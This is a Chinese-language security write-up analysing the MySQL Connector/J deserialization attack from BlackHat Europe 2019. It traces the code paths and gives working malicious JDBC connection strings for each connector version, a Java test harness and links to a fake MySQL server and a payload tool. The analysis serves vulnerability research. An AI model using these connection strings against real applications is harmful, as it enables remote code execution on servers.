首发安全客:https://www.anquanke.com/post/id/203086
这几天学习了BlackHat Europe 2019的议题《New Exploit Technique In Java Deserialization Attack》, 膜拜师傅们的同时,做一个简单的漏洞分析。
该漏洞需要能够控制客户端的JDBC连接串,在连接阶段即可触发,无需继续执行SQL语句。
需要自行根据版本选择JDBC连接串,最后有基于各版本Connector连接串的总结。
public class test1 {
public static void main(String[] args) throws Exception{
String driver = "com.mysql.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc";//8.x使用
//String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc";//5.x使用
Class.forName(driver);
Connection conn = DriverManager.getConnection(DB_URL);
}
}
MySQL服务器使用:https://github.com/fnmsd/MySQL_Fake_Server
一个可以方便的辅助MySQL客户端文件读取和提供MySQL JDBC反序列化漏洞所需序列化数据的假服务器,看本文前请先简单看下工具说明。
这里提供一份我加了JRE8u20的YSOSerial用以测试(集成了n1nty师傅的代码,膜一下):
链接:https://pan.baidu.com/s/12o5UFaln0qDUo0hPcIR1Eg 提取码:qdfc
原议题中使用这种方法,环境应该是8.x的connector
此处分析环境使用mysql-java-connector 8.0.14+jdk 1.8.20
参考 MySQL Connector/J 8.0 连接串参数属性手册
**queryInterceptors:**一个逗号分割的Class列表(实现了com.mysql.cj.interceptors.QueryInterceptor接口的Class),在Query"之间"进行执行来影响结果。(效果上来看是在Query执行前后各插入一次操作)
**autoDeserialize:**自动检测与反序列化存在BLOB字段中的对象。
所以如上所述,如果要触发queryInterceptors则需要触发SQL Query,而在getConnection过程中,会触发SET NAMES utf
、set autocommit=1
一类的请求,所以会触发我们所配置的queryInterceptors。
ServerStatusDiffInterceptor
的preProcess
方法(执行SQL Query前需要执行的方法),调用了populateMapWithSessionStatusValues
:
执行了SHOW SESSION STAUS
语句并获取结果,继续跟入resultSetToMap
方法:
ResultSetImpl
的getObject方法,当MySQL字段类型为BLOB时,会对数据进行反序列化,所以此处只要保证第1或第2字段为BLOB且存存储了我们的序列化数据,即可触发。
额外说一句: 确定字段为BLOB类型除了协议报文中列字段类型为BLOB以外,还需要FLAGS大于128、来源表不为空,否则会被当做Text,开发工具的时候这块卡了好久。
测试过程中发现5.x、6.x无法正常使用,参考mysql java connector的5.1、6.0、8.0的连接串说明,经过分析各版本代码后总结:
从6.0开始主要使用的包名从·com.mysql
变为了com.mysql.cj
,所以ServerStatusDiffInterceptor
所在位置也有所改变。
5.1.11-6.0.6使用的interceptors属性为statementInterceptors,8.0以上使用的为queryInterceptors。(这块不是很确定,因为6.0的手册上说从5.1.11就开始变为queryInterceptors,但是实际测试后仍为statementInterceptors)
5.1.11以下,无法直接通过连接触发:
在执行getConnection时,会执行到com.mysql.jdbc.ConnectionImpl中如下代码块:
可以发现上面标示的两行代码交换了位置(emm,不是完全一样,领会精神)。
前面分析所述的连接时的SQL查询是在createNewIO方法中会触发,但是由于5.1.10及以前,Interceptors的初始化在createNewIO之后,导致查询触发前还不存在Interceptors,故无法在getConnection时触发。
PS: 如果继续使用获取的连接进行SQL执行,还是可以触发反序列化的。
这个点最早貌似是chybeta师傅找出来的,膜一下。
一点要看的题外话: 看前面提到的5.x的手册,detectCustomCollations
这个选项是从5.1.29开始的,经过代码比对,可以认为detectCustomCollations
这个选项在5.1.29之前一直为true。
测试环境中使用mysql-connector-java 5.1.29+java 1.8.20:
触发点在com.mysql.jdbc.ConnectionImpl
的buildCollationMapping
方法中:
(调用栈就不放了,打个断点就到了)
可以看到两个条件:
detectCustomCollations
选项为truePS: 5.1.28的这条判断条件只有服务器版本大于4.1.0
SHOW COLLATION
的结果后,服务器版本大于等于5.0.0才会进入到上一节说过的resultSetToMap
方法触发反序列化此处getObject与前文一致不再赘述,此处只需要字段2或3为BLOB装载我们的序列化数据即可。
由于从5.1.41版本开始,不再使用getObject的方式获取SHOW COLLATION
的结果,此方法失效。
5.1.18以下未使用getObject方式进行获取,同样无法使用此方法:
用户名是基于MySQL Fake Server工具的,具体使用中请自行修改。
ServerStatusDiffInterceptor触发:
8.x:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
6.x(属性名不同):jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
5.1.11及以上的5.x版本(包名没有了cj):jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
5.1.10及以下的5.1.X版本: 同上,但是需要连接后执行查询。
5.0.x: 还没有ServerStatusDiffInterceptor
这个东西┓( ´∀` )┏
detectCustomCollations触发:
5.1.41及以上: 不可用
5.1.29-5.1.40:jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
5.1.28-5.1.19:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
5.1.18以下的5.1.x版本: 不可用
5.0.x版本不可用
以上总结通过MySQL JDBC Connector触发漏洞的两种方法分析以及相关版本情况,希望能对大家有所帮助。
由于仍旧是Java反序列化漏洞的范围,依然需要运行环境中有可用的Gadget。
再次膜发现漏洞的几位师傅~
漏洞相关:
https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf
https://www.cnblogs.com/Welk1n/p/12056097.html
https://github.com/codeplutos/MySQL-JDBC-Deserialization-Payload
MySQL java Connector手册:
https://dev.mysql.com/doc/connector-j/5.1/en/connector-j-reference-configuration-properties.html
https://docs.oracle.com/cd/E17952_01/connector-j-6.0-en/connector-j-6.0-en.pdf
https://dev.mysql.com/doc/connector-j/8.0/en/connector-j-reference-configuration-properties.html
360云安全团队目前大量招聘中,欢迎各位大佬投递简历,大家一起来愉快地玩耍~
https://www.anquanke.com/post/id/200462